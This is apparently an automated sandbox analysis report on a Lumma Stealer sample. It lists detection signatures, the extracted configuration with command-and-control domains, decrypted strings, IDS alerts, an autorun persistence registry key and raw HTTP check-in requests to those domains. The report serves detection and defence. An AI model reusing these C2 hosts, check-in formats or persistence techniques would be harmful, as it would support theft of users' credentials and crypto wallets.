Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe

Overview

General Information

Sample name:SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe
Analysis ID:1519702
MD5:aaf6f0c0f007e9462c8bf58acd555caf
SHA1:0125e82a9f1ec4297c6d3bf8f541882b5531f5f6
SHA256:927f2074ad7b76b46535cc94eb1fb357e528258dd0e55d828decb5ff5e70d2b9
Tags:exe
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Drops large PE files
Injects a PE file into a foreign processes
LummaC encrypted strings found
Sample uses string decryption to hide its real strings
AV process strings found (often used to terminate AV products)
Contains functionality to call native functions
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["offensivedzvju.shop", "fragnantbui.shop", "stogeneratmns.shop", "reinforcenh.shop", "vozmeatillu.shop", "gutterydhowi.shop", "ghostreedmnu.shop", "drawzhotdog.shop"], "Build id": "sG8pjw--MagooBR"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
    00000000.00000002.1886487919.00000000007D0000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
      decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe.2500000.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
          0.2.SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe.2500000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: CurrentVersion Autorun Keys Modification
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\Music\AviraUpdater\AviraOculus.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, ProcessId: 6412, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OculusAvira

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-26T21:26:17.076987+020020546531A Network Trojan was detected192.168.2.449734188.114.97.3443TCP
            2024-09-26T21:26:18.061879+020020546531A Network Trojan was detected192.168.2.449736104.21.4.136443TCP
            2024-09-26T21:26:18.985344+020020546531A Network Trojan was detected192.168.2.449738188.114.97.3443TCP
            2024-09-26T21:26:19.968358+020020546531A Network Trojan was detected192.168.2.449739188.114.97.3443TCP
            2024-09-26T21:26:20.986518+020020546531A Network Trojan was detected192.168.2.449740188.114.96.3443TCP
            2024-09-26T21:26:22.456694+020020546531A Network Trojan was detected192.168.2.449741172.67.162.108443TCP
            2024-09-26T21:26:23.482099+020020546531A Network Trojan was detected192.168.2.449742188.114.97.3443TCP
            2024-09-26T21:26:24.736633+020020546531A Network Trojan was detected192.168.2.449743188.114.96.3443TCP
            2024-09-26T21:26:25.664023+020020546531A Network Trojan was detected192.168.2.449744172.67.208.139443TCP
            2024-09-26T21:26:28.033341+020020546531A Network Trojan was detected192.168.2.449746172.67.128.144443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-26T21:26:17.076987+020020498361A Network Trojan was detected192.168.2.449734188.114.97.3443TCP
            2024-09-26T21:26:18.061879+020020498361A Network Trojan was detected192.168.2.449736104.21.4.136443TCP
            2024-09-26T21:26:18.985344+020020498361A Network Trojan was detected192.168.2.449738188.114.97.3443TCP
            2024-09-26T21:26:19.968358+020020498361A Network Trojan was detected192.168.2.449739188.114.97.3443TCP
            2024-09-26T21:26:20.986518+020020498361A Network Trojan was detected192.168.2.449740188.114.96.3443TCP
            2024-09-26T21:26:22.456694+020020498361A Network Trojan was detected192.168.2.449741172.67.162.108443TCP
            2024-09-26T21:26:23.482099+020020498361A Network Trojan was detected192.168.2.449742188.114.97.3443TCP
            2024-09-26T21:26:24.736633+020020498361A Network Trojan was detected192.168.2.449743188.114.96.3443TCP
            2024-09-26T21:26:25.664023+020020498361A Network Trojan was detected192.168.2.449744172.67.208.139443TCP
            2024-09-26T21:26:28.033341+020020498361A Network Trojan was detected192.168.2.449746172.67.128.144443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-26T21:26:21.992400+020020561571Domain Observed Used for C2 Detected192.168.2.449741172.67.162.108443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-26T21:26:22.980219+020020561551Domain Observed Used for C2 Detected192.168.2.449742188.114.97.3443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-26T21:26:16.584078+020020561631Domain Observed Used for C2 Detected192.168.2.449734188.114.97.3443TCP
            2024-09-26T21:26:18.561343+020020561631Domain Observed Used for C2 Detected192.168.2.449738188.114.97.3443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-26T21:26:17.624090+020020561651Domain Observed Used for C2 Detected192.168.2.449736104.21.4.136443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-26T21:26:19.520948+020020561611Domain Observed Used for C2 Detected192.168.2.449739188.114.97.3443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-26T21:26:25.242032+020020561511Domain Observed Used for C2 Detected192.168.2.449744172.67.208.139443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-26T21:26:24.184473+020020561531Domain Observed Used for C2 Detected192.168.2.449743188.114.96.3443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-26T21:26:20.494914+020020561591Domain Observed Used for C2 Detected192.168.2.449740188.114.96.3443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-26T21:26:21.498032+020020561561Domain Observed Used for C2 Detected192.168.2.4602901.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-26T21:26:22.460224+020020561541Domain Observed Used for C2 Detected192.168.2.4537981.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-26T21:26:16.070452+020020561621Domain Observed Used for C2 Detected192.168.2.4549401.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-26T21:26:17.088211+020020561641Domain Observed Used for C2 Detected192.168.2.4534091.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-26T21:26:18.999445+020020561601Domain Observed Used for C2 Detected192.168.2.4617181.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-26T21:26:24.738372+020020561501Domain Observed Used for C2 Detected192.168.2.4523591.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-26T21:26:23.625768+020020561521Domain Observed Used for C2 Detected192.168.2.4522891.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-26T21:26:20.003264+020020561581Domain Observed Used for C2 Detected192.168.2.4549991.1.1.153UDP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: https://steamcommunity.com/profiles/76561199724331900URL Reputation: Label: malware
            Source: https://steamcommunity.com/profiles/76561199724331900/inventory/URL Reputation: Label: malware
            Source: https://fragnantbui.shop/apipAvira URL Cloud: Label: malware
            Source: https://vozmeatillu.shop/O9Avira URL Cloud: Label: malware
            Source: https://vozmeatillu.shop/0Avira URL Cloud: Label: malware
            Source: stogeneratmns.shopAvira URL Cloud: Label: malware
            Source: https://reinforcenh.shop//O9Avira URL Cloud: Label: malware
            Source: reinforcenh.shopAvira URL Cloud: Label: malware
            Source: https://reinforcenh.shop/apiAvira URL Cloud: Label: malware
            Source: https://gutterydhowi.shop/Avira URL Cloud: Label: malware
            Source: ghostreedmnu.shopAvira URL Cloud: Label: malware
            Source: https://reinforcenh.shop/Avira URL Cloud: Label: malware
            Source: https://ghostreedmnu.shop/Avira URL Cloud: Label: malware
            Source: https://vozmeatillu.shop/apiAvira URL Cloud: Label: malware
            Source: fragnantbui.shopAvira URL Cloud: Label: malware
            Source: drawzhotdog.shopAvira URL Cloud: Label: malware
            Source: offensivedzvju.shopAvira URL Cloud: Label: malware
            Source: https://offensivedzvju.shop/apiAvira URL Cloud: Label: malware
            Source: https://stogeneratmns.shop/g9Avira URL Cloud: Label: malware
            Source: vozmeatillu.shopAvira URL Cloud: Label: malware
            Source: https://vozmeatillu.shop/apipAvira URL Cloud: Label: malware
            Source: https://drawzhotdog.shop/apiAvira URL Cloud: Label: malware
            Source: https://reinforcenh.shop:443/apiAvira URL Cloud: Label: malware
            Source: https://gutterydhowi.shop/apiAvira URL Cloud: Label: malware
            Source: https://reinforcenh.shop/apiiUAvira URL Cloud: Label: malware
            Source: https://offensivedzvju.shop/Avira URL Cloud: Label: malware
            Source: https://vozmeatillu.shop/Avira URL Cloud: Label: malware
            Source: https://reinforcenh.shop/7Avira URL Cloud: Label: malware
            Source: https://ghostreedmnu.shop/fAvira URL Cloud: Label: malware
            Source: https://ballotnwu.site/apiAvira URL Cloud: Label: malware
            Found malware configuration
            Source: 0.2.SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe.2500000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["offensivedzvju.shop", "fragnantbui.shop", "stogeneratmns.shop", "reinforcenh.shop", "vozmeatillu.shop", "gutterydhowi.shop", "ghostreedmnu.shop", "drawzhotdog.shop"], "Build id": "sG8pjw--MagooBR"}
            Multi AV Scanner detection for submitted file
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeReversingLabs: Detection: 18%
            Sample uses string decryption to hide its real strings
            Source: 00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmpString decryptor: reinforcenh.shop
            Source: 00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmpString decryptor: stogeneratmns.shop
            Source: 00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmpString decryptor: fragnantbui.shop
            Source: 00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmpString decryptor: drawzhotdog.shop
            Source: 00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmpString decryptor: vozmeatillu.shop
            Source: 00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmpString decryptor: offensivedzvju.shop
            Source: 00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmpString decryptor: ghostreedmnu.shop
            Source: 00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmpString decryptor: gutterydhowi.shop
            Source: 00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmpString decryptor: ghostreedmnu.shop
            Source: 00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
            Source: 00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
            Source: 00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
            Source: 00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
            Source: 00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
            Source: 00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmpString decryptor: sG8pjw--MagooBR
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.4.136:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49738 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49739 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49740 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.162.108:443 -> 192.168.2.4:49741 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49742 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49743 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.208.139:443 -> 192.168.2.4:49744 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49745 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.128.144:443 -> 192.168.2.4:49746 version: TLS 1.2

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2056162 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop) : 192.168.2.4:54940 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2056156 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawzhotdog .shop) : 192.168.2.4:60290 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2056160 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop) : 192.168.2.4:61718 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2056163 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI) : 192.168.2.4:49734 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2056158 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vozmeatillu .shop) : 192.168.2.4:54999 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2056152 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stogeneratmns .shop) : 192.168.2.4:52289 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2056164 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop) : 192.168.2.4:53409 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2056154 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fragnantbui .shop) : 192.168.2.4:53798 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2056161 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (offensivedzvju .shop in TLS SNI) : 192.168.2.4:49739 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2056165 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI) : 192.168.2.4:49736 -> 104.21.4.136:443
            Source: Network trafficSuricata IDS: 2056153 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (stogeneratmns .shop in TLS SNI) : 192.168.2.4:49743 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2056155 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fragnantbui .shop in TLS SNI) : 192.168.2.4:49742 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2056150 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (reinforcenh .shop) : 192.168.2.4:52359 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2056159 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (vozmeatillu .shop in TLS SNI) : 192.168.2.4:49740 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2056163 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI) : 192.168.2.4:49738 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2056151 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (reinforcenh .shop in TLS SNI) : 192.168.2.4:49744 -> 172.67.208.139:443
            Source: Network trafficSuricata IDS: 2056157 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI) : 192.168.2.4:49741 -> 172.67.162.108:443
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49746 -> 172.67.128.144:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49746 -> 172.67.128.144:443
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49734 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49734 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49741 -> 172.67.162.108:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49741 -> 172.67.162.108:443
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49742 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49738 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49736 -> 104.21.4.136:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49738 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49742 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49736 -> 104.21.4.136:443
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49740 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49740 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49744 -> 172.67.208.139:443
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49743 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49744 -> 172.67.208.139:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49743 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49739 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49739 -> 188.114.97.3:443
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: offensivedzvju.shop
            Source: Malware configuration extractorURLs: fragnantbui.shop
            Source: Malware configuration extractorURLs: stogeneratmns.shop
            Source: Malware configuration extractorURLs: reinforcenh.shop
            Source: Malware configuration extractorURLs: vozmeatillu.shop
            Source: Malware configuration extractorURLs: gutterydhowi.shop
            Source: Malware configuration extractorURLs: ghostreedmnu.shop
            Source: Malware configuration extractorURLs: drawzhotdog.shop
            Source: Joe Sandbox ViewIP Address: 104.21.4.136 104.21.4.136
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 172.67.162.108 172.67.162.108
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ghostreedmnu.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: gutterydhowi.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ghostreedmnu.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: offensivedzvju.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: vozmeatillu.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: drawzhotdog.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fragnantbui.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: stogeneratmns.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: reinforcenh.shop
            Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ballotnwu.site
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ogle.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' htt equals www.youtube.com (Youtube)
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: om/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recap8| equals www.youtube.com (Youtube)
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' htt equals www.youtube.com (Youtube)
            Source: global trafficDNS traffic detected: DNS query: ghostreedmnu.shop
            Source: global trafficDNS traffic detected: DNS query: gutterydhowi.shop
            Source: global trafficDNS traffic detected: DNS query: offensivedzvju.shop
            Source: global trafficDNS traffic detected: DNS query: vozmeatillu.shop
            Source: global trafficDNS traffic detected: DNS query: drawzhotdog.shop
            Source: global trafficDNS traffic detected: DNS query: fragnantbui.shop
            Source: global trafficDNS traffic detected: DNS query: stogeneratmns.shop
            Source: global trafficDNS traffic detected: DNS query: reinforcenh.shop
            Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
            Source: global trafficDNS traffic detected: DNS query: ballotnwu.site
